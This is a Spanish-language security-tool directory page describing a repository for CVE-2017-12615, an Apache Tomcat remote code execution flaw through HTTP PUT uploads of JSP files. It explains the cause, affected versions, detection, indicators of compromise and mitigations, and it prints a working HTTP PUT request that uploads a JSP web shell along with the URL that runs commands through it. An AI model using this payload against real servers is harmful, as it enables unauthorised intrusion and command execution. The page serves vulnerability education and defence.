Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/k3ystr0k3r/cve-2017-12615
Generación de PayloadsAnálisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubk3ystr0k3r/cve-2017-12615

CVE-2017-12615

CVE-2017-12615 - Apache Tomcat Ejecución Remota de Código (RCE)

Ver Repositorio
1hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2017-12615 - Ejecución remota de código (RCE) en Apache Tomcat

CVE-2017-12615 es una vulnerabilidad de ejecución remota de código (RCE) que afecta a Apache Tomcat 7.0.0 hasta 7.0.79 que se ejecuta en Microsoft Windows cuando las solicitudes HTTP PUT están habilitadas.

La vulnerabilidad existe porque Tomcat maneja incorrectamente los archivos JSP subidos cuando el DefaultServlet está configurado con el parámetro readonly establecido en false. En estas condiciones, un atacante no autenticado puede subir un archivo JSP malicioso directamente al servidor web y ejecutar código Java arbitrario con solo solicitar el archivo subido.

Esta vulnerabilidad se convirtió en uno de los problemas RCE de Tomcat más conocidos debido a lo fácil que era convertirla en un arma contra servidores mal configurados.


Versiones afectadas

  • Apache Tomcat 7.0.0 - 7.0.79
  • Instalaciones de Microsoft Windows
  • Método HTTP PUT habilitado
  • readonly="false" configurado en el DefaultServlet

Gravedad

MétricaValor
CVECVE-2017-12615
CVSS v38.1 (Alta)
Vector de ataqueRed
Privilegios requeridosNinguno
Interacción del usuarioNinguna
ImpactoEjecución remota de código

Causa raíz

Normalmente, Apache Tomcat impide que los usuarios suban archivos JSP ejecutables.

Sin embargo, cuando:

  • Las solicitudes HTTP PUT están habilitadas
  • El DefaultServlet es escribible (readonly=false)
  • Tomcat se ejecuta en Windows

un atacante puede subir un archivo JSP directamente a la raíz web.

Una vez subido, solicitar ese JSP hace que Tomcat lo compile y lo ejecute, lo que permite la ejecución de código Java arbitrario con los privilegios del servicio de Tomcat.


Flujo del ataque

root@kitploit:~
Atacante
    │
    │ HTTP PUT
    ▼
Sube una shell JSP maliciosa
    │
    ▼
Tomcat almacena el archivo
    │
    │ HTTP GET
    ▼
Solicita el JSP subido
    │
    ▼
Tomcat compila el JSP
    │
    ▼
Se ejecuta el código Java
    │
    ▼
Ejecución remota de código

Proceso de explotación

Un ataque típico sigue estos pasos:

  1. Identificar una instancia vulnerable de Tomcat.
  2. Verificar que las solicitudes HTTP PUT estén permitidas.
  3. Subir una web shell .jsp maliciosa.
  4. Solicitar el JSP subido.
  5. Ejecutar comandos arbitrarios del sistema.
  6. Establecer una reverse shell o desplegar payloads adicionales.

No se requiere autenticación si el servidor es vulnerable.


Ejemplo de solicitud

Ejemplo de solicitud HTTP PUT:

root@kitploit:~
PUT /shell.jsp HTTP/1.1
Host: victim.com
Content-Type: application/octet-stream

<%@ page import="java.io.*" %>
<%
Runtime.getRuntime().exec(request.getParameter("cmd"));
%>

Si tiene éxito, el servidor responde con:

root@kitploit:~
HTTP/1.1 201 Created

El payload se puede ejecutar visitando:

root@kitploit:~
http://victim.com/shell.jsp?cmd=whoami

Ejemplo de detección

Una forma sencilla de identificar sistemas vulnerables es intentar subir un JSP de prueba inofensivo:

root@kitploit:~
PUT /test.jsp

Las respuestas posibles incluyen:

root@kitploit:~
201 Created

o

root@kitploit:~
204 No Content

Si el archivo subido puede recuperarse posteriormente a través de HTTP, es probable que el servidor sea vulnerable.


Impacto

Una explotación exitosa permite a un atacante:

  • Ejecutar comandos arbitrarios del sistema operativo
  • Subir web shells persistentes
  • Obtener reverse shells
  • Desplegar malware o ransomware
  • Robar información sensible
  • Pivotar más profundamente en las redes internas
  • Comprometer por completo el servidor Tomcat afectado

Indicadores de compromiso

Los equipos de seguridad deben investigar:

  • Solicitudes HTTP PUT inesperadas
  • Archivos .jsp recién creados
  • Web shells desconocidas
  • Procesos hijo sospechosos generados por Tomcat
  • Conexiones de red de reverse shell
  • Actividad inusual dentro de la raíz web de Tomcat

Mitigación

Las mitigaciones recomendadas incluyen:

  • Actualizar Apache Tomcat a una versión parcheada.
  • Deshabilitar HTTP PUT a menos que sea absolutamente necesario.
  • Asegurarse de que el DefaultServlet utilice readonly="true".
  • Restringir los permisos de subida.
  • Supervisar la creación inesperada de archivos JSP.
  • Implementar un firewall de aplicaciones web (WAF).
  • Revisar periódicamente los registros de acceso de Tomcat para detectar solicitudes PUT sospechosas.

Resumen técnico

PropiedadValor
VulnerabilidadCarga arbitraria de JSP
CWECWE-434 - Carga sin restricciones de archivos con tipo peligroso
Autenticación requeridaNo
Complejidad de explotaciónBaja en configuraciones vulnerables
ResultadoEjecución remota de código
PlataformaWindows
ServicioApache Tomcat

Referencias

  • Base de Datos Nacional de Vulnerabilidades de NIST (NVD)
  • Avisos de seguridad de Apache Tomcat
  • Registro CVE: CVE-2017-12615

Descargo de responsabilidad

Este repositorio está destinado únicamente a fines educativos, investigación de seguridad defensiva y pruebas de penetración autorizadas. No utilice esta información contra sistemas sin permiso explícito.

Descargar herramienta